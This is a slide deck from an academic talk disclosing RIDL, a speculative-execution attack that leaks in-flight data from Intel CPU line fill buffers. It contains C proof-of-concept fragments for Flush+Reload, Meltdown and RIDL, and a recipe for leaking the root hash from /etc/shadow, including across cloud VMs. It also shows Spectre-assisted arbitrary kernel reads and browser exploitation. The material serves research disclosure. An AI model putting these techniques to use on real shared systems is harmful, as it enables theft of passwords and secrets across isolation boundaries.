# **RIDLed with CPU bugs**

<u>Stephan van Schaik</u> - <u>Alyssa Milburn</u>

Sebastian Österlund - Pietro Frigo - Giorgi Maisuradze\*

Kaveh Razavi - Herbert Bos - Cristiano Giuffrida





# **CPU**



# **THE CLOUD**

# **ISOLATION**

- Processes
- Containers
- Virtual machines

We trust CPUs to isolate virtual machines...

# OH-OH!

| ID      | Erratum |
|---------|---------|
| 1315703 | Modification of the translation table for a virtual page which is being accessed by an active process might lead to read-after-write ordering violation |
| 905797  | Failure to enforce read-after-read ordering rules |
| 961148  | Reads from DSU CLUSTER\* or ERX\* system registers might return corrupted data |
| 977072  | Accessing certain Debug or Generic Timer system registers in AArch32 might cause incorrect system register values |
| 981980  | Interrupt is taken immediately after MSR DAIF instruction masks the interrupt |
| 1043202 | AArch32 T32 CLREX in an IT block will clear exclusive monitor even if it fails condition code check |
| 1073348 | Concurrent instruction TLB miss and mispredicted return instruction might fetch wrong instruction stream |
| 1130799 | TLBI VAAE1 or TLBI VAALE1 targeting a page within hardware page aggregated address translation data in the L2 TLB might cause corruption of address translation data |
| 1165347 | Continuous failing STREX because of another core snooping from speculatively executed atomic behind constantly mispredicted branch might cause livelock |
| 1165522 | Speculative AT instruction using out-of-context translation regime could cause subsequent request to generate an incorrect translation |
| 1188873 | MRC read following MRRC read of specific Generic Timer in AArch32 might give incorrect result |
| 1207823 | The exclusive monitor might end up tracking an incorrect cache line in the presence of a VA-alias, causing a false pass on the exclusive access sequence |
| 1220197 | Streaming store under specific conditions might cause deadlock or data corruption |
| 1257314 | Multiple floating-point divides/square roots concurrently completing back-to-back and flushing back-to-back might cause data corruption |
| 1262606 | Concurrent instruction TLB miss and mispredicted branch instruction located at the end of 32MB region might fetch wrong instruction stream |
| 1262888 | Translation access hitting a prefetched L2 TLB entry under specific conditions might corrupt the L2 TLB leading to an incorrect translation |
| 1275112 | A T32 instruction inside an IT block followed by a mispredicted speculative instruction stream might cause a deadlock |
| 1463225 | Software Step might prevent interrupt recognition |
| 1286807 | Modification of the translation table for a virtual page which is being accessed by an active process might lead to read-after-read ordering violation |

- MCA Error May Incorrectly Report Overflow Condition
- MWAIT Instruction May Hang a Thread
- Miss Address Buffer Performance Counter May Be Inaccurate
- Three-Source Operand Floating Point Instructions May Block Another Thread on the Same Core
- FCMOV Instruction May Not Execute Correctly
- When SMAP is Enabled and EFLAGS.AC is Set, the Processor Will Fail to Page Fault on an Implicit Supervisor Access
- Instructions Retired Performance Counter May Be Inaccurate
- MWAIT or MWAITX Instructions May Fail to Correctly Exit From the Monitor Event Pending State
- Executing Code in the Page Adjacent to a Canonical Address Boundary May Cause Unpredictable Results
- In Real Mode or Virtual-8086 Mode MWAIT or MWAITX Instructions May Fail to Correctly Exit From the Monitor Event Pending State
- PCIe\* Controller Will Generate MSI (Message Signaled Interrupt) With Incorrect Requestor ID
- L3 Performance Event Counter May Be Inaccurate
- 16-bit Real Mode Applications May Fail When Virtual Mode Extensions (VME) Are Enabled
- Spurious Level 2 Branch Target Buffer (L2 BTB) Multi-Match Error May Occur
- CPUID Fn8000_0007_EDX[CPB] Incorrectly Returns 0
- PCIe® Link Exit to L0 in Gen1 Mode May Incorrectly Trigger NAKs
- Programming MSRC001_0015 Hardware Configuration (HWCR)[CpbDis] Does Not Affect All Threads In The Socket
- PCIe® Link in Gen3 Mode May Incorrectly Observe EDB Error and Enter Recovery
- xHCI Host May Fail To Respond to Resume Request From Downstream USB Device Within 1 ms
- 4K Address Boundary Crossing Load Operation May Receive Stale Data
- USB Device May Not be Enumerated After Device Reset
- Potential Violation of Read Ordering In Lock Operation In SMT (Simultaneous Multithreading) Mode
- The GuestInstrBytes Field of the VMCB on a VMEXIT May Incorrectly Return 0h

| Status | Errata |
|--------|--------|
| No Fix | Intel® CAT/CDP Might Not Restrict Cacheline Allocation Under Certain Conditions (Intel® Xeon® Processor Scalable Family) |
| No Fix | Intel® PT PSB+ Packets May be Omitted on a C6 Transition |
| No Fix | IDI_MISC Performance Monitoring Events May be Inaccurate |
| No Fix | Intel® PT CYC Packets Can be Dropped When Immediately Preceding PSB |
| No Fix | Intel® PT VM-entry Indication Depends on The Incorrect VMCS Control Field |
| No Fix | Intel® MBA Read After MSR Write May Return Incorrect Value |
| No Fix | In eMCA2 Mode, When The Retirement Watchdog Timeout Occurs CATERR# May be Asserted |
| No Fix | VCVTPS2PH To Memory May Update MXCSR in The Case of a Fault on The Store |
| No Fix | Intel® PT May Drop All Packets After an Internal Buffer Overflow |
| No Fix | Non-Zero Values May Appear in ZMM Upper Bits After SSE Instruction |
| No Fix | ZMM/YMM Registers May Contain Incorrect Values |
| No Fix | When Virtualization Exceptions are Enabled, EPT Violations May Generate Erroneous Virtualization Exceptions |
| No Fix | Intel® PT ToPA Tables Read From Non-Cacheable Memory During an Intel® TSX Transaction May Lead to Processor Hang |
| No Fix | Performing an XACQUIRE to an Intel® PT ToPA Table May Lead to Processor Hang |
| No Fix | Using Intel® TSX Instructions May Lead to Unpredictable System Behavior |
| No Fix | Reading Some C-state Residency MSRs May Result in Unpredictable System Behavior |
| No Fix | Performance in an 8sg System May Be Lower Than Expected |
| No Fix | Memory May Continue to Throttle after MEMHOT# De-assertion |
| No Fix | Unexpected Uncorrected Machine Check Errors May Be Reported |

# **PIPELINES**

We blindly trust CPU pipelines

We don't know how they work

# **SPECULATIVE EXECUTION**



a = compute()

if (a) doX(a)

[Figure: pipeline timeline (axis: Time)]

a = read memory

if (allowed to read memory)

doX(a)

# **EXCEPTION DEFERRAL**

# **TODAY**

Intel CPUs are everywhere

Intel has a bounty program

#### **INTEL CPU**






# **TODAY**

One class of Intel pipeline "bugs": MDS

#### I SPECULATE THAT THIS WON'T BE THE LAST SUCH BUG

# New speculative execution bug leaks data from Intel chips' internal buffers

Intel-specific vulnerability was found by researchers both inside and outside the company.

PETER BRIGHT - 5/14/2019, 8:10 PM

# Protecting your computer against Intel's latest security flaw is easy, unless it isn't

Spectre is going to haunt us for a very long time

By Dieter Bohn | @backlon | May 17, 2019, 9:12am EDT

# RIDL vulnerability hits Intel - new Side Channel Attack potentially is worse than Spectre and Meltdown

by Hilbert Hagedoorn on: 05/14/2019 08:38 PM | source: volkskrant.nl

# Buffer the Intel flayer: Chipzilla, Microsoft, Linux world, etc emit fixes for yet more data-leaking processor flaws

Intel CPUs dating back a decade are vulnerable to latest cousin of Spectre

By Thomas Claburn in San Francisco 14 May 2019 at 17:00

#### updates against MDS attacks

Microsoft releases standalone updates containing Intel microcode mitigations for recently disclosed MDS attacks.

By Liam Tung | June 4, 2019 -- 12:10 GMT (13:10 BST) | Topic: Security



Let's first talk about cache attacks

# **BACKGROUND**






#### **FLUSH + RELOAD**

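#### (1) FLUSH

```
/* Evict all 256 probe slots (one per 4096-byte page) from the cache. */
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

#### (2) VICTIM

```
/* The victim's secret-dependent load pulls one entry back into the cache. */
char byte = table[secret];
```

#### (3) RELOAD

```
/* Time a load from every slot; a short dt marks the slot the victim touched. */
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}
```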
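The reload loop above only measures each slot; turning the 256 timings into a byte is a separate step. A minimal sketch of that step, assuming the timings were stored in an array and that a fixed cycle threshold separates cache hits from DRAM accesses. The names `decode_fastest_slot`, `PROBE_SLOTS` and `HIT_THRESHOLD_CYCLES` are hypothetical, and the threshold value is a placeholder that would need calibration on the target machine.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define PROBE_SLOTS 256

/* Assumed cutoff in cycles: loads faster than this count as cache hits.
 * Placeholder value; it has to be calibrated per machine. */
#define HIT_THRESHOLD_CYCLES 100u

/* Returns the index of the fastest slot if it looks like a cache hit,
 * or -1 if no slot was fast enough. */
int decode_fastest_slot(const uint64_t latency[PROBE_SLOTS])
{
    assert(latency != NULL);

    int best = 0;
    for (int i = 1; i < PROBE_SLOTS; ++i) {
        if (latency[i] < latency[best]) {
            best = i;
        }
    }
    return latency[best] < HIT_THRESHOLD_CYCLES ? best : -1;
}
```

In the reload loop, each `dt` would be written to `latency[i]`, and the returned index is the attacker's guess for the secret byte.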

#### **Probe Array**

[Figure: the probe array across the three steps. After the flush, an ACCESS to any entry is served from DRAM; after the victim runs, the ACCESS to the entry indexed by SECRET is served from the CACHE.]

# **PREVIOUS ATTACKS**







- **SPECTRE**: CVE-2017-5715, CVE-2017-5753
- **FORESHADOW**: CVE-2018-3615, CVE-2018-3620, CVE-2018-3646

# **PREVIOUS ATTACKS**

- Meltdown
- Spectre
- Foreshadow or L1TF

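```
/* Victim side: the kernel touches the secret, so it sits in the L1d cache. */
char secret = *(volatile char *)kaddr;
```

(2) FLUSH

```
/* Evict all 256 probe slots so that any later hit is meaningful. */
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

(3) MELTDOWN

```
/* The TSX transaction (_xbegin/_xend, <immintrin.h>) suppresses the fault. */
if (_xbegin() == _XBEGIN_STARTED) {
    /* unsigned char keeps the probe offset within 0..255 pages */
    unsigned char byte = *(volatile unsigned char *)kaddr;
    char *p = probe + 4096 * byte;
    *(volatile char *)p;
    _xend();
}
```

(4) RELOAD

```
/* Time a load from every slot; the cached one encodes the leaked byte. */
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}
```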
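A single pass through the four steps does not always produce a hit, and a hit can be noise, so attacks of this kind are typically repeated and the results tallied. The slides do not show this step; the following is a minimal sketch under the assumption that each round yields either a slot index or -1 for "no hit". The names `record_round` and `most_likely_byte` are hypothetical.

```c
#include <assert.h>

#define PROBE_SLOTS 256

/* Records the outcome of one round; rounds without a hit (slot < 0)
 * are ignored. */
void record_round(unsigned votes[PROBE_SLOTS], int slot)
{
    assert(slot < PROBE_SLOTS);
    if (slot >= 0) {
        votes[slot]++;
    }
}

/* Returns the byte value seen most often, or -1 if no round hit.
 * On a tie, the lowest byte value wins. */
int most_likely_byte(const unsigned votes[PROBE_SLOTS])
{
    int best = -1;
    unsigned best_votes = 0;
    for (int i = 0; i < PROBE_SLOTS; ++i) {
        if (votes[i] > best_votes) {
            best_votes = votes[i];
            best = i;
        }
    }
    return best;
}
```

The vote array starts zeroed; after enough rounds, the value returned by `most_likely_byte` is taken as the leaked byte.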

Probe Array

[Figure: Meltdown step by step. The kernel data sits in the L1d cache; the transient load leaks that kernel data from the L1d cache into the probe array, so the ACCESS to the entry indexed by SECRET is served from the CACHE while every other entry is served from DRAM.]

# **MITIGATIONS**

- Kernel Page Table Isolation
- Array index masking
- XOR masking

# **KPTI**



**Problem**: leak kernel data from virtual addresses




**Solution**: unmap kernel addresses

So we have a system with all mitigations in place

```
pcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch
cpuid_fault cat_l3 cdp_l3 invpcid_single pti ssbd mba ibrs ibpb stibp
tpr_shadow vnmi flexpriority ept vpid ept_ad fsgsbase tsc_adjust bmi1 hle avx2
smep bmi2 erms invpcid rtm cqm mpx rdt_a avx512f avx512dq rdseed adx smap
clflushopt clwb intel_pt avx512cd avx512bw avx512vl xsaveopt xsavec xgetbv1
xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local dtherm ida arat
pln pts hwp hwp_act_window hwp_pkg_req flush_l1d
[sebastian@sarek ~]$ grep . /sys/devices/system/cpu/vulnerabilities/*
/sys/devices/system/cpu/vulnerabilities/l1tf:Mitigation: PTE Inversion; VMX: conditional cache flushes, SMT vulnerable
/sys/devices/system/cpu/vulnerabilities/meltdown:Mitigation: PTI
/sys/devices/system/cpu/vulnerabilities/spec_store_bypass:Mitigation: Speculative Store Bypass disabled via prctl and seccomp
/sys/devices/system/cpu/vulnerabilities/spectre_v1:Mitigation: __user pointer sanitization
/sys/devices/system/cpu/vulnerabilities/spectre_v2:Mitigation: Full generic retpoline, IBPB: conditional, IBRS_FW, STIBP: conditional, RSB filling
[sebastian@sarek ~]$
```
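Each file under `/sys/devices/system/cpu/vulnerabilities/` holds one status line that starts with `Not affected`, `Vulnerable`, or `Mitigation:`. A minimal sketch of how a script could classify such a line, assuming the line has already been read into a string; the names `classify_status`, `has_smt_caveat` and the `vuln_state` enum are hypothetical.

```c
#include <assert.h>
#include <string.h>

enum vuln_state {
    VULN_NOT_AFFECTED,
    VULN_MITIGATED,
    VULN_VULNERABLE,
    VULN_UNKNOWN
};

/* Classifies a sysfs status line by its leading keyword. */
enum vuln_state classify_status(const char *status)
{
    assert(status != NULL);
    if (strncmp(status, "Not affected", 12) == 0) {
        return VULN_NOT_AFFECTED;
    }
    if (strncmp(status, "Mitigation:", 11) == 0) {
        return VULN_MITIGATED;
    }
    if (strncmp(status, "Vulnerable", 10) == 0) {
        return VULN_VULNERABLE;
    }
    return VULN_UNKNOWN;
}

/* A line can report a mitigation and still flag SMT as exposed,
 * as the l1tf line in the output above does. */
int has_smt_caveat(const char *status)
{
    assert(status != NULL);
    return strstr(status, "SMT vulnerable") != NULL;
}
```

Checking for the SMT caveat separately matters here: a line that starts with `Mitigation:` does not by itself mean that sibling hardware threads are isolated.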

What can we still do as an attacker?

```
[sebastian@sarek ridl]$ cat /etc/shadow
cat: /etc/shadow: Permission denied
[sebastian@sarek ridl]$ sudo cat /etc/shadow | head -n 1
root:$6$sP/i.m6uVkNRJgpV$vyndShgzWmeWI8Bx8RbGCkj2SVvQ.bjqwRafe6rdnotl8ndQkvH/wf1u.cF31o9Ie0W/Ub/6CVEdbCJioHplW/:17828:0:99999:7:::
[sebastian@sarek ridl]$ ./hackpasswd root:
root:$6$sP/i.m6uVkNRJgpV$vyndShgzWmeWI8Bx8RbGCkj2SVvQ.bjgwRafe6%
[sebastian@sarek ridl]$
```

## Meet Rogue In-flight Data Load or RIDL

A new **class** of speculative execution attacks that knows no boundaries

Privilege levels are just a *social construct* 



We can leak between hardware threads!



But can we leak across other security domains?



Yes, we can!



We leak from the kernel ...



... across VMs ...



... from the hypervisor ...



... and from SGX enclaves!

We leak across all security domains!

Can we leak in the web browser?

Yes, we can!

- We reproduced RIDL in Mozilla Firefox
- ⇒ No need for special instructions

We leak across security domains, and in the browser!

Memory addresses are a *social construct* too

#### **PREVIOUS ATTACKS**

Previous attacks show we can speculatively leak from **addresses**

- **Spectre**: access out-of-bounds *addresses*
- **Meltdown**: leak kernel data from virtual *addresses*
- **Foreshadow**: leak from physical *addresses*

#### **PREVIOUS ATTACKS**

Our mitigation efforts focus on isolating/masking addresses

- **Spectre**: mask array index to limit *address* range
- **Meltdown**: unmap kernel *addresses* from userspace
- **Foreshadow**: invalidate physical *addresses*
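Array index masking, the Spectre mitigation listed above, can be sketched as follows. The idea is to compute a mask from the index and the array size with arithmetic instead of a branch, so that even a mispredicted bounds check cannot steer a load out of range. The names `index_mask_nospec` and `load_clamped` are hypothetical (similar in spirit to the Linux kernel's `array_index_nospec` helper), and the sketch assumes both values fit in the lower half of the `size_t` range. A compiler is free to turn such C back into a branch, so production code usually relies on inline assembly or compiler support; treat this as an illustration of the arithmetic only.

```c
#include <assert.h>
#include <limits.h>
#include <stddef.h>
#include <stdint.h>

/* Returns all ones if index < size, otherwise zero, using only
 * unsigned arithmetic. Assumes index and size are <= SIZE_MAX / 2. */
static inline size_t index_mask_nospec(size_t index, size_t size)
{
    const unsigned top_bit = sizeof(size_t) * CHAR_BIT - 1;
    assert(index <= SIZE_MAX / 2 && size <= SIZE_MAX / 2);
    /* index - size wraps around (top bit set) exactly when index < size. */
    return (size_t)0 - ((index - size) >> top_bit);
}

/* Bounds-checked load: the mask forces the index to 0 on any path,
 * architectural or speculative, where it is out of range. */
uint8_t load_clamped(const uint8_t *array, size_t size, size_t index)
{
    if (index >= size) {
        return 0;
    }
    index &= index_mask_nospec(index, size);
    return array[index];
}
```

The masked index limits the *address* range that a speculative load can reach, which is exactly the property RIDL sidesteps by not depending on addresses at all.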

#### **PREVIOUS ATTACKS**

- Previous attacks exploit addressing
- Mitigation by isolating/masking addresses

## **RIDL**

RIDL does *not* depend on addressing:

- ⇒ Bypass *all* address-based security checks
- ⇒ Makes RIDL **hard to mitigate**

What CPUs does RIDL affect?

We bought Intel and AMD CPUs from almost every generation since 2008

... and sent the invoices to our professor Herbert Bos



RIDL works on all mainstream Intel CPUs since 2008

# SUPPORT

#### Side-channel Vulnerability and Mitigation Methods

The security of our products is one of our most important priorities.

The threat environment continues to evolve. Intel is committed to investing in the security and resilience of our products, and to working to safeguard users.

Specific to side-channel vulnerabilities, mitigations have been provided for all variants noted below through a combination of updates for:

- Firmware
- Operating systems
- Virtual Machine Manager\*

System manufacturers have incorporated these updates. Some Intel products may contain hardware mitigations. See the table below for mitigation details:

**Vulnerability and Mitigation Method**

| Processor Model | Variant 1 (Bounds Check Bypass; also known as Spectre) | Variant 2 (Branch Target Injection; also known as Spectre) | Variant 3 (Rogue Data Cache Load; also known as Meltdown) | Variant 3a (Rogue System Register Read; also known as Meltdown) | Variant 4 (Rogue System Register Read) | Variant 5 (L1 Terminal Fault) |
|---|---|---|---|---|---|---|
| Intel® Core™ i9-9900k | OS/VMM | Firmware +OS | Hardware | Firmware | Firmware +OS | Hardware |
| Intel® Core™ i7-9700k | OS/VMM | Firmware +OS | Hardware | Firmware | Firmware +OS | Hardware |

#### Documentation

Content Type: Product Information & Documentation

Article ID: 000031501

Last Reviewed: 11/21/2018
| Intel® Core™<br>i5-9600k | OS/VMM                                                                | Firmware +OS                                                              | Hardware                                                              | Firmware                                                                    | Firmware<br>+OS                        | Hardware                                  |  |

Intel announces Coffee Lake Refresh


In-silicon mitigations against Meltdown and Foreshadow


Let's buy the Intel Core i9-9900K!

... and send another invoice to our professor Herbert Bos



We got it the day after we submitted the paper

RIDL works regardless of these in-silicon mitigations

# **AMD**

We also tried to reproduce it on AMD

RIDL does *not* affect AMD



But where are we *actually* leaking from?





Previous attacks had it *easy*: they leak from caches



Caches are well documented and well understood.



But RIDL does *not* leak from caches!



But what else is there to leak from?



There are other internal CPU buffers



Line Fill Buffers, Store Buffers and Load Ports



But there is more!



**Uncached Memory** 

We can leak from various internal CPU buffers!

RIDL is a **class** of speculative execution attacks also known as **M**icro-architectural **D**ata **S**ampling

Let's focus on one particular instance:

## **Line Fill Buffers**

#### **MANUALS**

MEM\_LOAD\_UOPS\_RETIRED.HIT\_LFB\_PS - Counts demand loads that hit in the line fill buffer (LFB). A LFB entry is allocated every time a miss occurs in the L1 DCache. When a load hits at this location it means that a previous load, store or hardware prefetch has already missed in the L1 DCache and the data fetch is in progress. Therefore the cost of a hit in the LFB varies. This event may count cache-line split loads that miss in the L1 DCache but do not miss the LLC.

On 32-byte Intel AVX loads, all loads that miss in the L1 DCache show up as hits in the L1 DCache or hits in the LFB. They never show hits on any other level of memory hierarchy. Most loads arise from the line fill buffer (LFB) when Intel AVX loads miss in the L1 DCache.

- We first read the manuals
- Some references to internal CPU buffers
- But no further explanation
- Where would you even start?

That's why we started reading patents instead!



We read a lot of patents, and survived!

So today I can tell you a bit more about them

But wait, what are these Line Fill Buffers?









### Multiple roles:

- Asynchronous memory requests
- Load squashing
- Write combining
- Uncached memory

**CPU design**: what to do on a cache miss?

- Send out memory request
- Wait for completion
- Blocks other loads/stores

**Solution**: keep track of address in LFB

- Send out memory request
- Allocate LFB entry
- Store address in LFB
- Serve other loads/stores
- Pending request *eventually* completes

A newly allocated LFB entry may still contain data from a previous load.

RIDL exploits this.
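To make the stale-entry idea concrete, here is a toy software model of a fill buffer. It is only a sketch: the entry count, the field names and the functions `lfb_alloc`, `lfb_fill` and `lfb_release` are assumptions made for illustration, not a description of the real hardware. The point it shows is that allocation records the new address but does not clear the data left by the previous request.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

#define LINE_SIZE   64  /* cache-line size in bytes */
#define LFB_ENTRIES 10  /* illustrative entry count, an assumption of this sketch */

/* Toy model of one fill-buffer entry. Purely illustrative. */
struct lfb_entry {
    bool     in_use;
    uint64_t addr;
    uint8_t  data[LINE_SIZE];
};

struct lfb {
    struct lfb_entry entry[LFB_ENTRIES];
};

/* Allocate an entry for a pending miss. Only the address is recorded;
 * the data bytes are deliberately NOT cleared, so whatever the previous
 * request left behind stays visible until the new fill arrives. */
static struct lfb_entry *lfb_alloc(struct lfb *b, uint64_t addr)
{
    assert(b != NULL);
    for (size_t i = 0; i < LFB_ENTRIES; ++i) {
        if (!b->entry[i].in_use) {
            b->entry[i].in_use = true;
            b->entry[i].addr = addr;
            return &b->entry[i];
        }
    }
    return NULL; /* all entries busy: the request would have to wait */
}

/* The memory request completes and the line arrives. */
static void lfb_fill(struct lfb_entry *e, const uint8_t *line)
{
    assert(e != NULL && e->in_use);
    memcpy(e->data, line, LINE_SIZE);
}

/* The line has been handed over; the entry is free for reuse. */
static void lfb_release(struct lfb_entry *e)
{
    assert(e != NULL);
    e->in_use = false;
}
```

In this model, a victim that fills and releases an entry leaves its bytes behind, and the next `lfb_alloc` call returns the same entry with those bytes still in `data`.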

# **EXPERIMENTS**

Experiments in the paper

Conclusion: our primary RIDL instance leaks from Line Fill Buffers

Cool... so how do we actually mount a RIDL attack?

# **IDEAS**

- We can leak in-flight data
- Let's get some sensitive data in-flight!

# LOCAL ATTACKER

# /ETC/SHADOW

```
$ strace passwd 2>&1
...

openat(
  AT_FDCWD,
  "/etc/shadow",
  O_RDONLY|O_CLOEXEC
)
```

## **CONFUSED DEPUTY**

- passwd opens /etc/shadow
- Can we get this on the other Hyper-Thread?

`taskset -c 3 ./passwd.sh`, where `passwd.sh` is:

```
while true; do
   passwd -S;
done
```

What does the attacker's program look like?

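#### (1) FLUSH

```
/* Flush every probe entry from the cache. */
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

#### (2) RIDL

```
if (_xbegin() == _XBEGIN_STARTED) {
  /* Faulting load: transiently returns in-flight data. */
  unsigned char byte = *(volatile unsigned char *)NULL;
  /* Encode the leaked byte as a cached probe entry. */
  char *p = probe + byte * 4096;
  *(volatile char *)p;
  _xend();
}
```

#### (3) RELOAD

```
/* Time each probe entry; the fast one reveals the byte. */
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}
```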
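The reload loop measures `dt` for every probe entry, but the slide does not show what happens to the measurements. One plausible way to turn them into a byte, sketched below, is to give a vote to every entry that reloads faster than a threshold and, after several rounds, pick the entry with the most votes. The names `record_round` and `best_guess` and the threshold of 100 cycles are assumptions for illustration; a real threshold has to be calibrated per machine.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define PROBE_ENTRIES 256

/* Hypothetical cutoff in cycles between a cache hit and a miss;
 * it has to be calibrated on the machine under test. */
#define HIT_THRESHOLD 100

/* Record one round of reload timings: every probe entry that loaded
 * faster than the threshold gets one vote. */
static void record_round(const uint64_t dt[PROBE_ENTRIES],
                         unsigned votes[PROBE_ENTRIES])
{
    assert(dt != NULL && votes != NULL);
    for (size_t i = 0; i < PROBE_ENTRIES; ++i) {
        if (dt[i] < HIT_THRESHOLD)
            ++votes[i];
    }
}

/* Return the byte value with the most votes, or -1 if no entry was
 * ever fast. Ties go to the lowest byte value. */
static int best_guess(const unsigned votes[PROBE_ENTRIES])
{
    int best = -1;
    unsigned best_votes = 0;

    assert(votes != NULL);
    for (size_t i = 0; i < PROBE_ENTRIES; ++i) {
        if (votes[i] > best_votes) {
            best_votes = votes[i];
            best = (int)i;
        }
    }
    return best;
}
```

Voting over repeated rounds is one simple way to suppress the occasional spurious cache hit; it is not necessarily the scheme the authors used.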

The faulting load `*(volatile char *)NULL` in step (2) leaks in-flight data from an invalid or unmapped page; this also works with demand paging.



The dependent load `probe + byte * 4096` in step (2) uses the leaked byte as an index into our probe array.



#### **Probe Array**

After the flush, reloading a probe entry is **SLOW**. Only the entry indexed by the leaked byte was brought back into the cache during step (2), so reloading that entry is **FAST**.



RIDL is like drinking from a fire hose



You just get whatever data is in flight!

We need to **synchronize** or do some **post-processing** 

- Synchronize: could be done using cache attacks, but we're lazy
- <u>Post-processing</u>: we can repeat measurements, stitch them together?

### **FILTERING DATA**

How can we filter data?

- We want to leak from /etc/shadow
- First line of /etc/shadow is for root
- Starts with "root:"
- Use prefix matching:
  - **Match** ⇒ we learn a new byte
  - **No Match** ⇒ discard
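The prefix-matching rule above can be sketched as a small post-processing helper. This is a simplified illustration, not the authors' implementation: it assumes each leaked sample is a run of bytes that starts at the same offset as the known prefix, and the function name `extend_prefix` is hypothetical.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Try to extend `known` (a NUL-terminated string stored in a buffer of
 * `cap` bytes) with one byte taken from a leaked sample.
 * Assumption of this sketch: the sample starts at the same offset as
 * the known prefix. Returns true when a new byte was learned. */
static bool extend_prefix(char *known, size_t cap,
                          const unsigned char *sample, size_t sample_len)
{
    assert(known != NULL && sample != NULL);

    size_t len = strlen(known);

    /* Need room for the new byte and the terminating NUL. */
    if (len + 2 > cap)
        return false;
    /* The sample must cover the whole prefix plus one new byte. */
    if (sample_len <= len)
        return false;
    /* No Match: the sample belongs to some other in-flight data. */
    if (memcmp(sample, known, len) != 0)
        return false;

    /* Match: we learn a new byte. */
    known[len] = (char)sample[len];
    known[len + 1] = '\0';
    return true;
}
```

Starting from `root:`, a sample such as `https://` is discarded, while a sample that begins with `root:` contributes the byte that follows the prefix. Repeating this over many samples grows the known string one byte at a time.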

# **FILTERING**

Known prefix: `root:`

- Leaked data `https://` ⇒ **No Match**, discard
- Leaked data that starts with `root:` ⇒ **Match**, the next byte extends the known prefix


# **CHALLENGES**

# **RESULT**

We can leak the **root password hash** from an **unprivileged user** 

Let's extend this a bit...

to the **cloud!** 

*[Diagram: an Attacker VM (SSH client, RIDL) and a Victim VM (SSH server, /etc/shadow) share the Line Fill Buffers.]*

- Victim VM in the cloud
- We get a VM on the same server
- We make sure it is co-located
- Victim VM runs an SSH server
- How do we get data in flight?
- We run an SSH client...
- ... that keeps connecting to the SSH server
- The SSH server loads /etc/shadow through LFB
- The contents from /etc/shadow are in flight

# **LEAKING**

- Now that the data is in flight, we want to leak it
- We run our RIDL program on our server...
- ...which leaks the data from the LFB

# WHAT ELSE?

# **SPECTRE**



# **RIDL + SPECTRE**

- We can use Spectre in combination with RIDL
- Train branch predictor to trust us
- Surprise it with an unexpected pointer

p = system call parameter

if (p points to userspace)

read memory from p

# ARBITRARY KERNEL LEAK

- copy\_from\_user() can access an arbitrary user-supplied pointer
- Repeatedly call setrlimit() with a valid user pointer to **train the branch predictor**
- After training, we supply a kernel **pointer we want to leak**
- The access is executed speculatively and the data is pulled into the LFB
- At the same time we **leak using RIDL**

#### **Victim**

```
int setrlimit(unsigned int resource,
    struct rlimit __user *rlim) {
  copy_from_user(..., rlim, ...);
}

unsigned long copy_from_user(void *to,
    const void __user *from,
    unsigned long n) {
  /* Branch we train: taken for valid user pointers. */
  if (likely(access_ok(from, n)))
    raw_copy_from_user(to, from, n);
  return n;
}
```

#### **User**

```
setrlimit(..., 0x00007fffff74ad30);
```

#### **User**

After training, the user passes a kernel pointer instead:

```
setrlimit(..., 0xffff80000fd1c950);
```

# WHAT NEXT??

We attacked the **cloud** and have an **arbitrary kernel read**.

We still need a local account on the target...



# **PORTABILITY**

- No TSX or other speculation mechanisms
- Can't use invalid pointers
- clflush is too useful

# **PORTABILITY**

- No clflush
  - Touch eviction sets
- No TSX/invalid pointers
  - Use **demand paging** to generate "valid" page faults
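As a rough illustration of evicting without `clflush`, the sketch below reads one byte from every cache line of a scratch buffer. It is a crude stand-in: a real eviction set contains only addresses that map to the same cache sets as the target, whereas this version sweeps a whole buffer that is assumed to be larger than the cache. The function name `evict_by_sweep` and the 64-byte line size are assumptions.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define CACHE_LINE 64 /* assumed cache-line size in bytes */

/* Crude replacement for clflush: touch one byte in every cache line of
 * a scratch buffer that is assumed to be larger than the cache holding
 * the probe array. Returns the number of lines touched. */
static size_t evict_by_sweep(const volatile uint8_t *scratch, size_t size)
{
    size_t touched = 0;

    assert(scratch != NULL);
    for (size_t off = 0; off < size; off += CACHE_LINE) {
        (void)scratch[off]; /* volatile read: the load is actually performed */
        ++touched;
    }
    return touched;
}
```

Whether a single sweep really evicts the target depends on the cache size and replacement policy, so this should be read as a starting point rather than a reliable primitive.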

## **PORTABILITY**

```
/* Evict buffer from cache. */
evict(buffer);
/* Speculatively load the secret. */
unsigned char value = *(new_page);
/* Calculate the corresponding entry. */
char *entry_ptr = buffer + (1024 * value);
/* Load that entry into the cache. */
*(entry_ptr);
/* Time the reload of each buffer entry to
   see which entry is now cached. */
for (k = 0; k < 256; ++k) {
  t0 = cycles();
  *(buffer + 1024 * k);
  if (cycles() - t0 < 100) ++results[k];
}
```

We can generate this code from **WebAssembly**!

*[Demo recording: one terminal runs `./victim.sh`; the other starts the RIDL SpiderMonkey attack on `ridl-shell.js`, pinned with `taskset -c 7`.]*

```
[ LOG ] - [0x20] = 12
[ LOG ] - [0x49] = 67  I
[ LOG ] - [0x74] = 46  t
[ LOG ] - [0x27] = 23  '
[ LOG ] - [0x73] = 111 s
[ LOG ] - [0x20] = 36
[ LOG ] - [0x6d] = 101 m
[ LOG ] - [0x65] = 109 e
[ LOG ] - [0x20] = 116
[ LOG ] - [0x4d] = 69  M
[ LOG ] - [0x61] = 125 a
[ LOG ] - [0x72] = 162 r
[ LOG ] - [0x69] = 125 i
[ LOG ] - [0x6f] = 72  o
[ LOG ] - [0x21] = 13  !
[ LOG ] - [0x22] = 10  "
[ LOG ] - Time16.45495575
